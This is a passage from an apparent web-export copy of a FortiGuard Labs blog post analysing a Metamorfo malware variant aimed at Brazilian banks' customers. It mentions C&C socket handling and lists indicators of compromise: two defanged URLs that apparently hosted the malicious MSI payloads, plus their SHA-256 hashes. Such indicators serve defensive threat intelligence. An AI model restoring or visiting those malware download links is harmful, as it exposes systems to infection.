aem-GridColumn--default--9 aem-GridColumn aem-GridColumn--offset--default--1\">               <noscript data-cmp-image=\"{&#34;smartImages&#34;:[],&#34;smartSizes&#34;:[],&#34;lazyEnabled&#34;:true}\">             <img decoding=\"async\" src=\"\/blog\/threat-research\/analysis-metamorfo-variant-targets-financial-organizations\/_jcr_content\/root\/responsivegrid\/image_1854141351.img.png\/1578616531190\/metamorfo-table-two.png\" alt>         <\/noscript>                   <\/div>\n<div class=\"cmp cmp-text aem-GridColumn aem-GridColumn--default--12\">\n<p>Conn2Read() is a function of the Conn2 socket to receive and process the command and control commands from the C&amp;C server. Conn2 socket starts when received the command \u201c<b>[-VIDEO-]<\/b>\u201d in Conn1Read(). The table below shows its commands and descriptions:<\/p>\n<\/p><\/div>\n<div class=\"cmp cmp-image aem-GridColumn--default--none aem-GridColumn--default--9 aem-GridColumn aem-GridColumn--offset--default--1\">               <noscript data-cmp-image=\"{&#34;smartImages&#34;:[],&#34;smartSizes&#34;:[],&#34;lazyEnabled&#34;:true}\">             <img decoding=\"async\" src=\"\/blog\/threat-research\/analysis-metamorfo-variant-targets-financial-organizations\/_jcr_content\/root\/responsivegrid\/image_112222180.img.png\/1578616612754\/metamorfo-table-three.png\" alt>         <\/noscript>                   <\/div>\n<div class=\"cmp cmp-text aem-GridColumn aem-GridColumn--default--12\">\n<h2>Solution<\/h2>\n<p>If you are a customer of a targeted Brazilian financial organization and you never run their applications or open one of their web pages on an infected computer, this variant of Metamorfo will not collect information.<\/p>\n<p>The two downloaded URLs are rated as \u201c<b>Malicious Websites<\/b>\u201c by the FortiGuard Web Filtering service.<\/p>\n<p>Both of the MSI files are detected and blocked by the FortiGuard Antivirus service.<\/p>\n<h2>IOCs:<\/h2>\n<p><b>URLs<\/b><\/p>\n<p>hxxps[:]\/\/is[.]gd\/vphbra?YTOMHZO3IYSYBGB86SYFIT\/862023\/YTOMHZO3IYSYBGB86SYFIT<\/p>\n<p>hxxps[:]\/\/raw[.]githubusercontent[.]com\/edx23\/X435\/master\/img.zip<\/p>\n<p><b>Sample SHA-256<\/b><\/p>\n<p>[XlsPlan_Visualize.msi]<\/p>\n<p>631F6664876C1BD02BE60A8AF9A44030307E0FFA2C1239A95559559EDD0481D3<\/p>\n<p>[img.jpg or KJFLDKRE.msi]<\/p>\n<p>1A37AC4498AE3071DE271970E992968505BE95177FBB5BE2A3DA33A3A1514CEC<\/p>\n<p><i>Learn how\u00a0<a href=\"https:\/\/www.fortinet.com\/fortiguard\/threat-intelligence\/threat-research.html?utm_source=nreleaseblog&amp;utm_campaign=2018-q2-fortiguardlabs-cta\">FortiGuard Labs<\/a>\u00a0provides\u00a0unmatched security and intelligence services using integrated\u00a0<a href=\"https:\/\/twitter.com\/hashtag\/AI?src=hashtag_click\">AI<\/a>\u00a0systems.\u00a0<\/i><\/p>\n<p><i>Find out about the FortiGuard Security Services\u00a0<a href=\"https:\/\/www.fortinet.com\/support-and-training\/support-services\/fortiguard-security-subscriptions.html?utm_source=blog&amp;utm_campaign=2018-blog-security-services\">portfolio<\/a>\u00a0and s<a href=\"https:\/\/www.fortinet.com\/fortiguard\/threat-intelligence\/threat-research.html?utm_source=nreleaseblog&amp;utm_campaign=2018-q2-fortiguardlabs-cta\">ign up<\/a>\u00a0for our weekly FortiGuard Threat Brief.\u00a0<\/i><\/p>\n<p><i>Discover how\u00a0the FortiGuard\u00a0<a href=\"https:\/\/www.fortinet.com\/support-and-training\/support-services\/fortiguard-security-subscriptions\/security-rating.html?utm_source=blog&amp;utm_campaign=2018-blog-security-rating-service\">Security Rating Service<\/a>\u00a0provides\u00a0security audits and best practices to guide customers in designing, implementing, and maintaining the security posture best suited for their organization.<\/i><\/p>\n<\/p><\/div>\n<div class=\"raw-import aem-GridColumn aem-GridColumn--default--12\">\n<div class=\"text-container\"><\/div>\n<\/p><\/div>\n<\/p><\/div>\n<p><a href=\"http:\/\/feedproxy.google.com\/~r\/fortinet\/blog\/threat-research\/~3\/FnAUGO2Q5c4\/analysis-metamorfo-variant-targets-financial-organizations.html\" target=\"bwo\" >http:\/\/feeds.feedburner.com\/fortinet\/blog\/threat-research<\/a><\/p>\n","protected":false},"excerpt":{"rendered":"<p><img decoding=\"async\" src=\"\/blog\/threat-research\/analysis-metamorfo-variant-targets-financial-organizations\/_jcr_content\/root\/responsivegrid\/image_1866256683.img.png\/1579115666486\/email-content1-copy.png\"\/><br \/>Read about a new variant of the Metamorfo malware targeting Brazilian financial organizations, in this analysis from FortiGuard Labs.&lt;img src=&#8221;http:\/\/feeds.feedburner.com\/~r\/fortinet\/blog\/threat-research\/~4\/FnAUGO2Q5c4&#8243; height=&#8221;1&#8243; width=&#8221;1&#8243; alt=&#8221;&#8221;\/&gt;<\/p>\n","protected":false},"author":4,"featured_media":0,"comment_status":"open","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"colormag_page_container_layout":"default_layout","colormag_page_sidebar_layout":"default_layout","footnotes":""},"categories":[10424,10378],"tags":[],"class_list":["post-17455","post","type-post","status-publish","format-standard","hentry","category-fortinet","category-security"],"_links":{"self":[{"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/posts\/17455","targetHints":{"allow":["GET"]}}],"collection":[{"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/users\/4"}],"replies":[{"embeddable":true,"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/comments?post=17455"}],"version-history":[{"count":0,"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/posts\/17455\/revisions"}],"wp:attachment":[{"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/media?parent=17455"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/categories?post=17455"},{"taxonomy":"post_tag","embeddable":true,"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/tags?post=17455"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}